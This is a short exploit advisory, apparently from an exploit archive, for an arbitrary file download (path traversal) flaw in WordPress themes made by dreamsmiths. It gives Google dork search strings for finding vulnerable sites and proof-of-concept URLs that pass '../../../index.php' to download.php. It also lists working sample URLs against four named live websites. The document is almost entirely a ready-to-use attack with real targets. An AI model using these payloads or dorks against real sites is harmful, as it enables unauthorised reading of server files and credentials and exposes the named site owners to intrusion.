WordPress Dreamsmiths Themes version 0.0.1 suffers from an arbitrary file download vulnerability.
70e7b14338cee8434121d445a5d8df4306f3cbe0660cf766d5d1db94a92d44d7
# Exploit Title: UWordpress dreamsmiths Themes Arbitrary File Download
# Google Dork: inurl:/wp-content/themes/fiestaresidences/
inurl:wp-content/themes/hsv/ inurl:wp-content/themes/erinvale/
# Date: 2018/01/08
# Exploit Author: IRaNHaCK Security Team
# Vendor Homepage: iranhack.com
# Software Link: http://www.dreamsmiths.com/
# Version: 0.0.1
# Tested on: 7 , KAli
P0c:
Arbitrary Download PHP File in all WordPress themes By dreamsmiths :
site.com/wp-content/themes/fiestaresidences/download.php?file=../../../index.phpsite.com/wp-content/themes/optimus/download.php?file=../../../index.phpsite.com/wp-content/themes/erinvale/download.php?file=../../../index.phpsite.com/wp-content/themes/hsv/download.php?file=../../../index.php
Sample:
https://fiestaresidences.com/wp-content/themes/fiestaresidences/download.php?file=download.php
https://erinvale.co.za/wp-content/themes/erinvale/download.php?file=download.php
https://hsvhospitality.com/wp-content/themes/hsv/download.php?file=download.php
http://www.optimusproperty.net/wp-content/themes/optimus/download.php?file=download.php